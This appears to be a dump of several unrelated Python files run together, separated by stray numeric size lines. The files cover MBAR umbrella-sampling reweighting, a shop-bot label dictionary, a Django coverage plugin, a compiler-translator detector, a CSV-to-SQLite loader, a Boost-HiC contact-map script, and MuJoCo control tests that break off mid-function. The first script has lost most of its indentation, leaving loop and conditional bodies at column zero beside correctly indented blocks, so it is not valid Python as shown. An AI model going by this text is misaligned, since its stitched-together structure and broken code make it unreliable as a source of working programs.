print("Iteration %d" % (N_), file=f_bs)
# Select random samples
g_reduction = 50
N_red = np.random.randint(allN, size=allN//g_reduction)
N_red = np.sort(N_red)
N_k_red = np.zeros([K], np.int32)
N_cumsum = np.cumsum(N_k)
N_cumsum = np.hstack((np.array([0]), N_cumsum))
# Determine N_k_red by binning
for i in range(K):
N_bin = (N_cumsum[i] <= N_red[:]) & (N_red[:] < N_cumsum[i+1])
N_k_red[i] = N_bin.sum()
u_n_red = u_n[N_red]
mag_n_red = mag_n[N_red]
u_kn_red = np.zeros((K, allN//g_reduction))
for k in range(K):
# Compute from umbrella center k
dmag = mag_n_red[:] - mag0_k[k]
# Compute energy of samples with respect to umbrella potential k
u_kn_red[k,:] = beta_k[k]*(u_n_red[:] + (K_k[k]/2.0) * (dmag/1575.0)**2 - mu_k[k]*mag_n_red[:])
# Construct magnetization bins
print("Binning data...", file=f_bs)
delta_mag = (mag_max - mag_min) / float(mag_nbins)
# compute bin centers
bin_center_i_mag = np.zeros([mag_nbins], np.float64)
for i in range(mag_nbins):
bin_center_i_mag[i] = mag_min + delta_mag/2 + delta_mag * i
# Bin data
bin_n = np.zeros([allN//g_reduction], np.int64)+mag_nbins+10
nbins = 0
bin_counts = list()
bin_centers = list() # bin_centers[i] is a tuple that gives the center of bin i
for j in range(mag_nbins):
# Determine which configurations lie in this bin
in_bin = (bin_center_i_mag[j]-delta_mag/2 <= mag_n_red[:]) & (mag_n_red[:] < bin_center_i_mag[j]+delta_mag/2)
# Count number of configurations in this bin
bin_count = in_bin.sum()
if (bin_count > 0):
# store bin
bin_centers.append(bin_center_i_mag[j])
bin_counts.append( bin_count )
# assign these conformations to the bin index
bin_n[np.where(in_bin)[0]] = nbins
# increment number of bins
nbins += 1
# Get total number of things that were binned
bin_counts_np = np.array(bin_counts)
bin_count_total = bin_counts_np.sum()
bin_count_ideal = allN
# Make array with total combinations of bin_center_i_mag and bin_center_i_mag
bin_center_possible = np.zeros((mag_nbins,1))
bin_center_empty = np.zeros((mag_nbins,1))
for i in range(mag_nbins):
bin_center_possible[i] = bin_center_i_mag[i]
# Determine empty bins
for i in range(nbins):
for k in range(mag_nbins):
if((bin_centers[i] == bin_center_i_mag[k])):
bin_center_empty[k] = 1
print("%d bins were populated:" % nbins, file=f_bs)
for i in range(nbins):
print("bin %5d (%6.5f) %12d conformations" % (i, bin_centers[i], bin_counts[i]), file=f_bs)
print("%d empty bins" % (mag_nbins-nbins), file=f_bs)
for j in range(mag_nbins):
if(bin_center_empty[j] == 0):
print("bin (%6.5f)" % (bin_center_possible[j]), file=f_bs)
print("%d / %d data used" % (bin_count_total, bin_count_ideal), file=f_bs)
# Initialize MBAR.
print("Running MBAR...", file=f_bs)
if(mbar_count == 0):
mbar = pymbar.MBAR(u_kn_red, N_k_red, verbose = True, relative_tolerance=1e-10)
mbar_ref = mbar.f_k
mbar_count = mbar_count+1
else:
mbar = pymbar.MBAR(u_kn_red, N_k_red, verbose = True, relative_tolerance=1e-10, initial_f_k=mbar_ref)
print('At reweighting step', file=f_bs)
# Now have weights, time to have some fun reweighting
u_n_red_original = u_n_red.copy()
T_targets_low = np.linspace(2.0,3.0,26)
T_targets_high = np.linspace(3.025, 3.7, 28)
T_targets = np.hstack((T_targets_low, T_targets_high))
low_comp_storage = np.zeros(T_targets.shape)
high_comp_storage = np.zeros(T_targets.shape)
mu_1_storage = np.zeros(T_targets.shape)
mu_2_storage = np.zeros(T_targets.shape)
mu_storage = np.zeros(T_targets.shape)
# Compute PMF in unbiased potential (in units of kT) at kT = 1
(f_i, df_i) = mbar.computePMF(u_n_red, bin_n, nbins)
# Show free energy and uncertainty of each occupied bin relative to lowest free energy
print("1D PMF", file=f_bs)
print("", file=f_bs)
print("%8s %6s %8s %10s %10s" % ('bin', 'mass', 'N', 'f', 'df'), file=f_bs)
for i in range(nbins):
print('%8d %10.8e %8d %10.10e %10.10e' % (i, bin_centers[i], bin_counts[i], f_i[i], df_i[i]), file=f_bs)
# Write out PMF to file
f_ = open('free_energy_'+str(mag_nbins)+'_original_'+str(N_)+'.txt', 'w')
print("PMF (in units of kT)", file=f_)
print("%8s %6s %8s %10s %10s" % ('bin', 'mass', 'N', 'f', 'df'), file=f_)
for i in range(nbins):
print('%8d %10.8g %8d %16.16e %16.16e' % (i, bin_centers[i], bin_counts[i], f_i[i], df_i[i]), file=f_)
f_.close()
for j in range(len(T_targets)):
print("Reweighting at temperature "+str(T_targets[j]), file=f_bs)
# reweight to temperature of interest
u_n_red = u_n_red_original.copy()
beta_reweight = 1.0/(kB*T_targets[j]) # beta factor for the different temperatures
u_n_red = beta_reweight*u_n_red
# Compute PMF in unbiased potential (in units of kT) at kT = 1
(f_i_base, df_i_base) = mbar.computePMF(u_n_red, bin_n, nbins)
mu_low = -1.0
mu_high = 1.0
# Now have mu_low and mu_high, use a bounded method to find mu which causes
# f_i(comp_low) \approx f_i(comp_high)
# let's use scipy's minimize_scalar solver for this
# Have to define a function that we want to operate on
def free_diff_comp(mu, f_i_base, bin_centers, beta_reweight):
    """Difference between the minima of the two PMF basins under field *mu*.

    Relies on ``nbins`` from the enclosing scope; the divider between the
    low- and high-magnetization basins is fixed at 3/4 of the bins.
    """
    tilted = f_i_base - beta_reweight * mu * bin_centers
    divide = int(3.0 * nbins / 4.0)
    low_min = tilted[0:divide].min()
    high_min = tilted[divide:nbins].min()
    return high_min - low_min
print("", file=f_bs)
print("Finding mu_eq_1", file=f_bs)
# Find minimum
mu_eq_1 = brentq(free_diff_comp, a=mu_low, b=mu_high, args=(f_i_base, np.array(bin_centers), beta_reweight))
mu_1_storage[j] = mu_eq_1
print("mu_eq_1 %17.17e"%(mu_eq_1), file=f_bs)
print("", file=f_bs)
# Now output results
# Reweight to mu_eq
f_i = f_i_base.copy()
f_i = f_i - beta_reweight*mu_eq_1*np.array(bin_centers)
f_i -= f_i.min()
# Show free energy and uncertainty of each occupied bin relative to lowest free energy
print("1D PMF with mu_eq_1", file=f_bs)
print("", file=f_bs)
print("%8s %6s %8s %10s" % ('bin', 'mass', 'N', 'f'), file=f_bs)
for i in range(nbins):
print('%8d %10.8g %8d %10.8e' % (i, bin_centers[i], bin_counts[i], f_i[i]), file=f_bs)
f_ = open('mu_eq_1_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("%17.17e"%(mu_eq_1), file=f_)
f_.close()
# Write out PMF to file
f_ = open('pmf_eq_1_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("PMF with mu_eq_1 (in units of kT)", file=f_)
print("%8s %6s %8s %10s" % ('bin', 'mass', 'N', 'f'), file=f_)
for i in range(nbins):
print('%8d %10.8g %8d %16.16e' % (i, bin_centers[i], bin_counts[i], f_i[i]), file=f_)
f_.close()
# Write out probability to file
p_i=np.exp(-f_i-logsumexp(-f_i))
f_ = open('p_i_eq_1_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("PMF with mu_eq_1 (in units of kT)", file=f_)
print("%8s %6s %8s %10s" % ('bin', 'mass', 'N', 'p'), file=f_)
for i in range(nbins):
print('%8d %10.8g %8d %16.16e' % (i, bin_centers[i], bin_counts[i], p_i[i]), file=f_)
f_.close()
# Now do it such that areas under peaks are the same
def free_diff_comp_area(mu, f_i_base, nbins, bin_centers, beta_reweight):
f_i = f_i_base - beta_reweight*mu*bin_centers
p_i=np.exp(-f_i-logsumexp(-f_i))
# Determine mid_comp
# Filter f_i to determine where to divide peak
f_i_filter = savgol_filter(f_i, window_length=41, polyorder=3)
f_i_filter_2 = savgol_filter(f_i_filter, window_length=41, polyorder=3)
rel_max = signal.argrelmax(f_i_filter_2, order=10)
# print rel_max
npeak = nbins//2
if(len(rel_max[0]) == 0):
npeak = nbins//2
else:
npeak = signal.argrelmax(f_i_filter_2, order=10)[0].max()
# As bin size is equal for now, can just do naive sum as equivalent to
# midpoint rule barring a constant factor
low_area = np.trapz(p_i[0:npeak], x = bin_centers[0:npeak])
high_area = np.trapz(p_i[npeak:nbins], x = bin_centers[npeak:nbins])
return high_area-low_area
print("", file=f_bs)
print("Finding mu_eq_2", file=f_bs)
# Find minimum: equal-area coexistence potential, bracketed around mu_eq_1.
mu_eq_2 = brentq(free_diff_comp_area, a=mu_eq_1-0.05, b=mu_high+0.05, args=(f_i_base, nbins, np.array(bin_centers), beta_reweight))
mu_2_storage[j] = mu_eq_2
print("mu_eq_2 %17.17e"%(mu_eq_2), file=f_bs)
print("", file=f_bs)
# Now output results
# Reweight to mu_eq
f_i = f_i_base.copy()
f_i = f_i - beta_reweight*mu_eq_2*np.array(bin_centers)
f_i -= f_i.min()  # shift so the lowest free energy is zero
# Show free energy and uncertainty of each occupied bin relative to lowest free energy
# NOTE(review): df_i is presumably the bootstrap uncertainty computed earlier
# in the script -- not visible here; confirm.
print("1D PMF with mu_eq_2", file=f_bs)
print("", file=f_bs)
print("%8s %6s %8s %10s %10s" % ('bin', 'mass', 'N', 'f', 'df'), file=f_bs)
for i in range(nbins):
    print('%8d %10.8g %8d %10.8e %10.8e' % (i, bin_centers[i], bin_counts[i], f_i[i], df_i[i]), file=f_bs)
# Persist mu_eq_2 for this temperature / system size.
f_ = open('mu_eq_2_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("%17.17e"%(mu_eq_2), file=f_)
f_.close()
# Write out PMF to file
f_ = open('pmf_eq_2_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
print("PMF with mu_eq_2 (in units of kT)", file=f_)
print("%8s %6s %8s %10s %10s" % ('bin', 'mass', 'N', 'f', 'df'), file=f_)
for i in range(nbins):
    print('%8d %10.8g %8d %16.16e %16.16e' % (i, bin_centers[i], bin_counts[i], f_i[i], df_i[i]), file=f_)
f_.close()
# Get compositions
p_i=np.exp(-f_i-logsumexp(-f_i))
f_ = open('p_i_eq_2_'+str(mag_nbins)+'_'+str(T_targets[j])+'_'+str(N_)+'.txt', 'w')
# BUG FIX: header previously said "mu_eq_1" (copy-paste from the eq_1 block);
# this file holds the distribution reweighted to mu_eq_2.
print("PMF with mu_eq_2 (in units of kT)", file=f_)
print("%8s %6s %8s %10s" % ('bin', 'mass', 'N', 'p'), file=f_)
for i in range(nbins):
    print('%8d %10.8g %8d %16.16e' % (i, bin_centers[i], bin_counts[i], p_i[i]), file=f_)
f_.close()
# Determine mid_comp: smooth the PMF twice, then use the right-most local
# maximum of the smoothed curve as the dividing bin between the peaks.
f_i_filter = savgol_filter(f_i, window_length=41, polyorder=3)
f_i_filter_2 = savgol_filter(f_i_filter, window_length=41, polyorder=3)
rel_max = signal.argrelmax(f_i_filter_2, order=10)
npeak = nbins//2
if(len(rel_max[0]) == 0):
    # No local maximum found: fall back to the middle bin and log it.
    npeak = nbins//2
    print('Weird divergence at %8d' % (j), file=f_bs)
else:
    npeak = signal.argrelmax(f_i_filter_2, order=10)[0].max()
bin_centers_np = np.array(bin_centers)
p_i_mass = bin_centers_np*p_i
mass_avg = p_i_mass.sum()  # probability-weighted mean mass
bin_closest = np.abs(bin_centers-mass_avg)
print("mass_avg %17.17e"%(mass_avg))
# Now get entry that is closest to value
mid_comp = np.argmin(bin_closest)
# NOTE(review): the assignment above is a dead store -- mid_comp is
# immediately overwritten with npeak below. Confirm which split was intended.
mid_comp = npeak
# Take the probability-weighted average mass on each side of the split.
low_comp = p_i_mass[0:mid_comp].sum()/p_i[0:mid_comp].sum()
high_comp = p_i_mass[mid_comp:nbins].sum()/p_i[mid_comp:nbins].sum()
print(low_comp, high_comp, T_targets[j])
# NOTE(review): 1575.0 appears to convert average mass into a fraction
# (total particle count?) -- confirm against the simulation setup.
low_comp_storage[j] = low_comp/1575.0
high_comp_storage[j] = high_comp/1575.0
# Write the per-temperature composition and chemical-potential tables.
f_ = open('composition_reweight_'+str(N_)+'.txt', 'w')
# BUG FIX: removed the stray `print('T phi_low phi_high', end=' ', file=f_)`
# that glued an unformatted duplicate header onto the real header line.
print("%10s %10s %10s" % ('T', 'phi_low', 'phi_high'), file=f_)
for i in range(len(T_targets)):
    print('%16.16e %16.16e %16.16e' % (T_targets[i], low_comp_storage[i], high_comp_storage[i]), file=f_)
f_.close()
f_ = open('mu_reweight'+str(N_)+'.txt', 'w')
print("%10s %10s %10s" % ('T', 'mu_peaks', 'mu_area'), file=f_)
for i in range(len(T_targets)):
    print('%16.16e %16.16e %16.16e' % (T_targets[i], mu_1_storage[i], mu_2_storage[i]), file=f_)
f_.close()
f_bs.close()
| 18,195 | 7,244 |
# UI label strings keyed by action id.
# NOTE(review): "contact1" is a template -- {Store_name} and {store_phone}
# are presumably substituted via str.format at send time; confirm at call site.
texts = {
    "browse":"🗂️ Browse categories",
    "orders":"📥 My orders",
    "cart":"🛒 My cart",
    "settings":"⚙ Settings",
    "contact":"📞 Contact us",
    "home":"🏠 Home",
    "contact1":"{Store_name} - {store_phone}",
}
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/django_coverage_plugin/blob/master/NOTICE.txt
"""Django Template Coverage Plugin"""
from .plugin import DjangoTemplatePluginException # noqa
from .plugin import DjangoTemplatePlugin
def coverage_init(reg, options):
    """Coverage.py plugin entry point: register the Django template tracer."""
    tracer = DjangoTemplatePlugin(options)
    reg.add_file_tracer(tracer)
| 396 | 123 |
#!/usr/bin/env python2
# Copyright 2015 Dejan D. M. Milosavljevic
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import platform
import os
import nucleotide
import nucleotide.component
import nucleotide.component.windows
import nucleotide.component.windows._common
import nucleotide.component.windows._common.translator
import nucleotide.component.windows.mingw
import nucleotide.component.windows.mingw.translator
import nucleotide.component.windows.msvc
import nucleotide.component.windows.msvc.translator
import nucleotide.component.windows.cygwingcc
import nucleotide.component.windows.cygwingcc.translator
## Detect MinGW on Windows
class Translator:
    """Aggregates the compiler/translator definitions available on the
    current platform (Windows or Cygwin)."""

    # Kept for interface compatibility; every instance rebinds its own list.
    m_list = []

    def __init__(self):
        self.m_list = []
        if not Translator._detect():
            return
        I__common = nucleotide.component.windows._common.translator.Translator()
        self.m_list += I__common.get()
        I_mingw = nucleotide.component.windows.mingw.translator.Translator()
        self.m_list += I_mingw.get()
        if 'Windows' == platform.system():
            I_msvc = nucleotide.component.windows.msvc.translator.Translator()
            self.m_list += I_msvc.get()
        if 'CYGWIN_NT' in platform.system():
            # BUG FIX: previously instantiated the MinGW translator a second
            # time here; use the Cygwin GCC translator, matching extend().
            I_cygwin = nucleotide.component.windows.cygwingcc.translator.Translator()
            self.m_list += I_cygwin.get()

    def get(self):
        """Return the collected translator list."""
        return self.m_list

    def check(self):
        pass

    @staticmethod
    def extend(P_options):
        """Extend P_options with every translator relevant to this platform."""
        if not Translator._detect():
            return
        nucleotide.component.windows._common.translator.Translator.extend(P_options)
        nucleotide.component.windows.mingw.translator.Translator.extend(P_options)
        if 'Windows' == platform.system():
            nucleotide.component.windows.msvc.translator.Translator.extend(P_options)
        if 'CYGWIN_NT' in platform.system():
            nucleotide.component.windows.cygwingcc.translator.Translator.extend(P_options)

    @staticmethod
    def _detect():
        """Return True on Windows or Cygwin, False (with a message) elsewhere."""
        if 'Windows' == platform.system():
            return True
        if 'CYGWIN_NT' in platform.system():
            return True
        print("Unknown Platform: " + platform.system())
        return False
| 3,006 | 989 |
import os
import pandas as pd
import sqlite3
# Load the BuddyMove reviews CSV into a SQLite table, then report counts.
CSV_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "data", "buddymove_holidayiq.csv")
DB_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "data", "buddymove_holidayiq.db")
# NOTE(review): `connection` is never closed/committed explicitly.
connection = sqlite3.connect(DB_FILEPATH)
table_name = "reviews2"
df = pd.read_csv(CSV_FILEPATH)
# assigns a column label "id" for the index column
df.index.rename("id", inplace=True)
df.index += 1 # starts ids at 1 instead of 0
print(df.head())
# NOTE(review): to_sql raises ValueError if "reviews2" already exists;
# if_exists="replace" would make the script rerunnable.
df.to_sql(table_name, con=connection)
cursor = connection.cursor()
cursor.execute(f"SELECT count(distinct id) as review_count FROM {table_name};")
results = cursor.fetchone()
print(results, "RECORDS")
# Other approach
# conn = sqlite3.connect("buddymove_holidayiq.sqlite3")
# data.to_sql('review', conn, if_exists = 'replace')
# curs = conn.cursor()
# query = "SELECT * FROM review"
# results = curs.execute(query).fetchall()
# print("There are", len(results), "rows")
# ----------------------------------------
# (Stretch) What are the average number of reviews for each category?
# NOTE(review): this opens a DIFFERENT database file (relative path, not in
# data/) and queries table "review", which is not created above -- it
# presumably exists from a previous run; confirm.
conn = sqlite3.connect("buddymove_holidayiq.sqlite3")
curs = conn.cursor()
categories = ['Sports', 'Religious', 'Nature', 'Theatre', 'Shopping', 'Picnic']
query = "SELECT * FROM review"
length = len(curs.execute(query).fetchall())
for item in categories:
    query = f"SELECT SUM({item}) FROM review"
    results = curs.execute(query).fetchall()
    print(f'Average number of reviews for {item} column:', round(results[0][0]/length))
| 1,511 | 523 |
from .. import ActionsNode
from ..visitor import Visitor
class SimilarActionsCompacter(Visitor):
    """Merges consecutive ActionsNode instances that share an action type."""

    def _visit_actions_node(self, node, replacements):
        """
        Merge `node` with its already-compacted successor when both are
        ActionsNode instances of the same action type.

        :param node: node being visited
        :type node: ActionsNode
        :param replacements: mapping from original nodes to their compacted
            successor lists
        :return: single-element list containing the (possibly merged) node
        """
        compact_successors = replacements[node.successor]
        # BUG FIX: the implicitly-concatenated message parts lacked a
        # separating space and rendered as "...this isnot allowed...".
        assert len(compact_successors) < 2, "The {} visitor returned more than one successor for an ActionNode, this is " \
            "not allowed. Got: {}".format(self, compact_successors)
        compact_successor = compact_successors[0]
        if isinstance(compact_successor, ActionsNode) and compact_successor.get_action_type() == node.get_action_type():
            # Fold the successor's actions into this node and splice it out.
            node.actions_info = node.actions_info + compact_successor.actions_info
            node.successor = compact_successor.successor
        else:
            node.successor = compact_successor
        return [node]
| 971 | 269 |
#!/usr/bin/python3 -u
import argparse
import logging
import os
import h5py
import numpy as np
import pandas as pd
import sys
# my own toolkit
import HiCutils
import convert
import utils
DEFAULT_OUTPUT_FOLDER = './boosted/'
logging.basicConfig(level=logging.DEBUG)
logging.getLogger("").setLevel(logging.INFO)
# NOTE(review): the f-string has no placeholders, and "Boos-HiC" looks like a
# typo for "Boost-HiC"; renaming would change log output, so left as is.
logger = logging.getLogger(f'Boos-HiC')
# Command-line interface.
p = argparse.ArgumentParser()
p.add_argument("operation", default="boost", choices=["boost", "sample"],
               help="Operation to be executed")
p.add_argument("-m", "--matrixfilename", required=True,
               help="contact map stored in tab separated file as : "
                    "bin_i / bin_j / counts_ij Only no zero values are stored. Contact map are symmetric. "
                    "Alternatively, you can provide a cooler format file (.cool), in this case no --bedfilename is needed.")
p.add_argument("-b", "--bedfilename", help="bed file of genomic coordinate of each bin")
p.add_argument("-c", "--chromosomes", nargs='+', help="Which chromosomes to boost, otherwise all chromosomes")
p.add_argument("-o", "--output_prefix", default=None,
               help="Prefix for output files, including the output folder. "
                    f"If not given, it will be in subfolder '{DEFAULT_OUTPUT_FOLDER}' plus basename of the input matrixfilename "
                    "without its file extension.")
p.add_argument("-f", "--format", default="cool", choices=["cool", "hdf5"], help="output file format")
p.add_argument("-g", "--genome_assembly", default="ce11", help="genome assembly as metadata for .cool file")
p.add_argument("-k", "--keep_filtered_bins", action='store_true',
               help="Whether to keep filtered out bins, otherwise they will be removed from the result matrix. "
                    "Not used yet.")
p.add_argument("-a", "--alpha", default=0.24, type=float,
               help="AFTER a lot of test : 0.24 is always a good and safe compromise, you must use this value")
args = p.parse_args(sys.argv[1:])
# input file
Operation = args.operation
bedfilename = args.bedfilename
matrixfilename = args.matrixfilename
chromosomes = args.chromosomes
# NOTE(review): `format` shadows the builtin of the same name.
format = args.format
keep_filtered_bins = args.keep_filtered_bins
genome_assembly = args.genome_assembly
alpha = args.alpha
if args.output_prefix:
    output_prefix = args.output_prefix
else:
    # Default: ./boosted/<input basename without extension>
    if not os.path.exists(DEFAULT_OUTPUT_FOLDER):
        os.mkdir(DEFAULT_OUTPUT_FOLDER)
    output_prefix = DEFAULT_OUTPUT_FOLDER + os.path.splitext(os.path.basename(matrixfilename))[0]
    # alternative in the same folder of the input matrix
    # output_prefix = os.path.splitext(matrixfilename)[0]
###
def BoostHiC(amat, alpha_exponent=None):
    """Boost a Hi-C contact map.

    SCN-normalizes `amat`, runs shortest paths (Floyd) on the power-law
    transformed contacts, converts the result back to contact space, and
    rescales it to the normalized matrix's distribution.

    :param amat: square contact matrix (numpy array)
    :param alpha_exponent: power-law exponent; defaults to the module-level
        `alpha` parsed from the command line (previously the only option).
    :return: boosted contact matrix
    """
    exp = alpha if alpha_exponent is None else alpha_exponent
    normmat = HiCutils.SCN(np.copy(amat))
    ff_normmat = HiCutils.fastFloyd(1 / np.power(np.copy(normmat), exp))
    FFmat = np.power(ff_normmat, -1 / exp)  # to dist, FF, to contact in one line
    boostedmat = HiCutils.adjustPdS(normmat, FFmat)
    return boostedmat
def Sample(amat, repositoryout):
    """Write downsampled copies of `amat` at several sampling percentages.

    :param amat: square contact matrix (numpy array)
    :param repositoryout: output filename prefix
    """
    percentofsample = [0.1, 1., 10.]
    for j in percentofsample:
        logger.info(f"Value of sample: {j}")
        chrmat_s = np.copy(amat)
        chrmat = HiCutils.downsample_basic(chrmat_s, j)
        # Context manager guarantees the HDF5 file is closed even on error
        # (the original leaked the handle if the assignment raised).
        with h5py.File(repositoryout + "inputmat_sampleat_" + str(j) + "_percent.hdf5", "w") as fh5:
            fh5['data'] = chrmat
# ## CODE EXECUTION ## #
# load the data
logger.info("LOADING MATRIX")
if matrixfilename.endswith('.cool'):
    D, total, resolution, D_cooler = convert.loadabsdatafile_cool(matrixfilename)
else:
    D, total, resolution = convert.loadabsdatafile(bedfilename)
    D_cooler = None
print(*D.items(), sep='\n')
print(f'Total bins:{total} resolution:{resolution}')
# Accumulators for the combined multi-chromosome .cool output.
bins_boosted = pd.DataFrame(columns=['chrom', 'start', 'end'])
pixels_boosted = pd.DataFrame(columns=['bin1_id', 'bin2_id', 'count'])
chroms = chromosomes if chromosomes else D.keys()
bin_offs = 0
for chrom in chroms:
    repositoryout = f'{output_prefix}_{chrom}_'
    if D_cooler:
        basemat = D_cooler.matrix(balance=False).fetch(chrom)
    else:
        beginfend = D[chrom][0]
        endfend = D[chrom][1]
        logger.info(f"Chromosome {chrom} data fend : {beginfend},{endfend}")
        basemat = convert.loadmatrixselected(matrixfilename, beginfend, endfend)
    # matrix filtering
    logger.info("FILTERING")
    bins_num = basemat.shape[0]
    pos_out = HiCutils.get_outliers(basemat)
    utils.savematrixasfilelist3(pos_out, repositoryout + "filteredbin.txt")
    basematfilter = basemat[np.ix_(~pos_out, ~pos_out)]
    basematfilter = np.copy(basematfilter)
    # basematfilter=basematfilter[0:1000,0:1000]
    logger.info(f'len(basemat):{len(basemat)}, len(basematfilter):{len(basematfilter)}')
    # Persist the raw and filtered input matrices in the requested format(s).
    if format is None or format == "hdf5":
        fh5 = h5py.File(repositoryout + "inputmat.hdf5", "w")
        fh5['data'] = basemat
        fh5.close()
    if format is None or format == "cool":
        convert.hic_to_cool(basemat, chrom, resolution, repositoryout + "inputmat.cool",
                            genome_assembly=genome_assembly)
    if format is None or format == "hdf5":
        fh5 = h5py.File(repositoryout + "inputmat_filtered.hdf5", "w")
        fh5['data'] = basematfilter
        fh5.close()
    if format is None or format == "cool":
        convert.hic_to_cool(basematfilter, chrom, resolution, repositoryout + "inputmat_filtered.cool",
                            genome_assembly=genome_assembly)
    if Operation == "boost":
        logger.info("Boost Hic")
        boosted = BoostHiC(basematfilter)
        # save
        if format is None or format == "hdf5":
            fh5 = h5py.File(repositoryout + "boostedmat.hdf5", "w")
            fh5['data'] = boosted
            fh5.close()
        if format is None or format == "cool":
            filtered_bins = pos_out if keep_filtered_bins else None
            chrom_bins, chrom_pixels = convert.get_bins_pixels(boosted, chrom, resolution,
                                                               bin_offs=bin_offs, bins_num=bins_num,
                                                               filtered_bins=filtered_bins)
            # save as cool
            cool_file = f"{repositoryout}boosted.cool"
            convert.create_cool(chrom_bins, chrom_pixels, resolution, cool_file, genome_assembly=genome_assembly)
            # collecting all boosted chromosomes in one
            bins_boosted = pd.concat([bins_boosted, chrom_bins])
            pixels_boosted = pd.concat([pixels_boosted, chrom_pixels])
            # NOTE(review): bin offset advances only on the cool path --
            # confirm this is intentional for hdf5-only runs.
            bin_offs += bins_num
    elif Operation == "sample":
        logger.info("SAMPLING")
        Sample(basematfilter, repositoryout)
# Combined multi-chromosome output (supported only for .cool format).
# BUG FIX: `and` binds tighter than `or`, so the previous condition
# `Operation == "boost" and format is None or format == "cool"` also ran this
# aggregation for Operation == "sample" whenever format == "cool" (the
# default). Parenthesize to express the intended grouping.
if Operation == "boost" and (format is None or format == "cool"):
    repositoryout = output_prefix + (f'_{"_".join(chromosomes)}_' if chromosomes else '_')
    cool_file = f"{repositoryout}boosted{'_kfb' if keep_filtered_bins else ''}.cool"
    convert.create_cool(bins_boosted, pixels_boosted, resolution, cool_file, genome_assembly=genome_assembly)
    # Balance, then build a multi-resolution pyramid with cooler's CLI.
    cmd = f'cooler balance --cis-only --force {cool_file}'
    logger.info(f'CALL: {cmd}')
    os.system(cmd)
    resolutions = [5000, 10000, 20000, 50000, 100000, 200000, 500000, 1000000]
    resolutions_str = ','.join([str(r) for r in resolutions])
    cmd = f'cooler zoomify -r "{resolutions_str}" {cool_file}'
    logger.info(f'CALL: {cmd}')
    os.system(cmd)
| 7,416 | 2,497 |
import gym
from ilqr import iLQR
import numpy as np
import pytest
from aprl.agents.monte_carlo import (
MonteCarloParallel,
MonteCarloSingle,
MujocoResettableWrapper,
receding_horizon,
)
from aprl.agents.mujoco_lqr import (
MujocoFiniteDiffCost,
MujocoFiniteDiffDynamicsBasic,
MujocoFiniteDiffDynamicsPerformance,
)
# The two finite-difference dynamics implementations under test.
dynamics_list = [MujocoFiniteDiffDynamicsBasic, MujocoFiniteDiffDynamicsPerformance]


@pytest.mark.parametrize("dynamics_cls", dynamics_list)
def test_lqr_mujoco(dynamics_cls):
    """Smoke test for MujocoFiniteDiff{Dynamics,Cost}.

    Jupyter notebook experiments/mujoco_control.ipynb has quantitative results
    attained; for efficiency, we only run for a few iterations here."""
    env = gym.make("Reacher-v2").unwrapped
    env.seed(42)
    env.reset()
    dynamics = dynamics_cls(env)
    cost = MujocoFiniteDiffCost(env)
    N = 10  # planning horizon
    ilqr = iLQR(dynamics, cost, N)
    x0 = dynamics.get_state()
    us_init = np.array([env.action_space.sample() for _ in range(N)])
    xs, us = ilqr.fit(x0, us_init, n_iterations=3)
    # Sanity-check returned shapes and that the first action is valid.
    assert x0.shape == xs[0].shape
    assert xs.shape[0] == N + 1
    assert us.shape == (N, 2)
    assert env.action_space.contains(us[0])
def rollout(env, actions):
    """Step `env` through `actions`, collecting the per-step results.

    Returns (obs, rews, dones) as numpy arrays plus the raw list of infos.
    """
    steps = [env.step(action) for action in actions]
    if not steps:
        return np.array([]), np.array([]), np.array([]), []
    obs, rews, dones, infos = (list(column) for column in zip(*steps))
    return np.array(obs), np.array(rews), np.array(dones), infos
def make_mujoco_env(env_name, seed):
    """Create a seeded MuJoCo env wrapped for state save/restore."""
    wrapped = MujocoResettableWrapper(gym.make(env_name).unwrapped)
    wrapped.seed(seed)
    wrapped.reset()
    return wrapped
# Environments exercised by the Monte Carlo tests below.
MONTE_CARLO_ENVS = ["Reacher-v2", "HalfCheetah-v2", "Hopper-v2"]


@pytest.mark.parametrize("env_name", MONTE_CARLO_ENVS)
def test_mujoco_reset_env(env_name, horizon=10, seed=42):
    """Saving and restoring MuJoCo state must make rollouts reproducible."""
    env = make_mujoco_env(env_name, seed)
    state = env.get_state()
    actions = [env.action_space.sample() for _ in range(horizon)]
    first_obs, first_rews, first_dones, _first_infos = rollout(env, actions)
    # Restore the saved state and replay the identical action sequence.
    env.set_state(state)
    second_obs, second_rews, second_dones, _second_infos = rollout(env, actions)
    # Compare to 5 decimal places to tolerate float32 round-off.
    np.testing.assert_almost_equal(second_obs, first_obs, decimal=5)
    np.testing.assert_almost_equal(second_rews, first_rews, decimal=5)
    assert (first_dones == second_dones).all()
def check_monte_carlo(
    kind, score_thresholds, total_horizon, planning_horizon, trajectories, seed=42
):
    """Build a test function verifying Monte Carlo search on a named env.

    :param kind: "single" or "parallel" Monte Carlo implementation
    :param score_thresholds: env name -> minimum acceptable total reward
    :param total_horizon: steps in the receding-horizon rollout
    :param planning_horizon: lookahead depth per search
    :param trajectories: number of sampled trajectories per search
    :param seed: RNG seed for env and search
    :return: test closure taking an env name
    """
    def f(env_name):
        # Setup
        env = make_mujoco_env(env_name, seed)
        if kind == "single":
            mc = MonteCarloSingle(env, planning_horizon, trajectories)
        elif kind == "parallel":
            env_fns = [lambda: make_mujoco_env(env_name, seed) for _ in range(2)]
            mc = MonteCarloParallel(env_fns, planning_horizon, trajectories)
        else:  # pragma: no cover
            raise ValueError("Unrecognized kind '{}'".format(kind))
        mc.seed(seed)
        # Check for side-effects: searching must not mutate the env state.
        state = env.get_state()
        _ = mc.best_action(state)
        assert (env.get_state() == state).all(), "Monte Carlo search has side effects"
